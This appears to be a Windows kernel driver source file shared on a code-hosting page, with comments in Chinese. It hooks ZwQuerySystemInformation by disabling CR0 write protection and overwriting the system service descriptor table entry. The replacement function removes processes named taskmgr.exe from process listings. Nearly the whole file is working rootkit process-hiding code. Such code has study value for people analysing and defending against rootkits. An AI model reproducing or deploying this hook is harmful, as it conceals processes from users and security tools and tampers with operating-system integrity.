📄 zwquerysysteminformation.c
字号:
#include <ntddk.h>
#include <string.h>
VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject);
///////////////////定义本地结构体//////////////////////////////////////////
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};
///////////////声明Native API///////////////////////////////////////
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
/////////////////定义ntoskrnl.exe的服务表结构////////////////////////////////////////////////
typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
////////////////////定义所用到的全局变量///////////////
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
unsigned long OldCr0;
UNICODE_STRING DeviceNameString;
UNICODE_STRING LinkDeviceNameString;
NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS status;
PDEVICE_OBJECT deviceObject;
RtlInitUnicodeString( &DeviceNameString, L"\\Device\\HideProcess" );
RtlInitUnicodeString( &LinkDeviceNameString,L"\\DosDevices\\HideProcess" );
KdPrint(("DriverEntry Enter............................\n"));
status = IoCreateDevice(
DriverObject,
0,
&DeviceNameString,
FILE_DEVICE_DISK_FILE_SYSTEM,
FILE_DEVICE_SECURE_OPEN,
FALSE,
& deviceObject );
if (!NT_SUCCESS( status ))
{
KdPrint(( "DriverEntry: Error creating control device object, status=%08x\n", status ));
return status;
}
status = IoCreateSymbolicLink(
(PUNICODE_STRING) &LinkDeviceNameString,
(PUNICODE_STRING) &DeviceNameString
);
if (!NT_SUCCESS(status))
{
IoDeleteDevice(deviceObject);
return status;
}
DriverObject->DriverUnload=UnloadDriver;
//////////////////////Hook ZwQuerySystemInformation/////////////////////////////////////////////////
_asm{
cli;
mov eax,cr0
mov OldCr0,eax
and eax,0fffeffffh
mov cr0,eax
}
_asm{
mov ecx, dword ptr [ZwQuerySystemInformation];
mov edx, [ecx+1];
mov eax, dword ptr [KeServiceDescriptorTable];
mov esi, [eax];
mov edx, [esi+edx*4];
mov dword ptr [OldZwQuerySystemInformation], edx
mov ecx, [ecx+1]
mov eax, [eax]
mov dword ptr [eax+ecx*4], offset MyZwQuerySystemInformation;
}
_asm
{
mov eax,OldCr0
mov cr0,eax
sti;
}
KdPrint(("Hook ZwQuerySystemInformation'status is Succeessfully "));
return status ;
}
VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uniWin32NameString;
UNICODE_STRING LinkNameString;
PDEVICE_OBJECT deviceObject;
//////////////////////UnHook ZwQuerySystemInformation/////////////////////////////////////////////////
_asm{
cli;
mov eax,cr0
mov OldCr0,eax
and eax,0fffeffffh
mov cr0,eax
}
_asm{
mov ecx, dword ptr [ZwQuerySystemInformation];
mov edx, [ecx+1];
mov eax, dword ptr [KeServiceDescriptorTable];
mov esi, [eax];
mov ebx, dword ptr [OldZwQuerySystemInformation];
mov [esi+edx*4],ebx;
}
_asm
{
mov eax,OldCr0
mov cr0,eax
sti;
}
KdPrint(("UnHookZwQuerySystemInformation'status is Succeessfully................... "));
deviceObject= DriverObject->DeviceObject;
IoDeleteSymbolicLink(&LinkDeviceNameString);
ASSERT(!deviceObject->AttachedDevice);
if ( deviceObject != NULL )
{
IoDeleteDevice( deviceObject );
}
}
NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;
UNICODE_STRING process_name;
RtlInitUnicodeString(&process_name, L"taskmgr.exe");
rc = (OldZwQuerySystemInformation) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if(NT_SUCCESS(rc))
{
if(5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
while(curr)
{
if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))
{
KdPrint(("hide process'name taskmgr.exe"));
if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;
break;
}
}
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
}
KdPrint(("HookZwQuerySystemInformation'status is Succeessfully................... "));
return rc;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -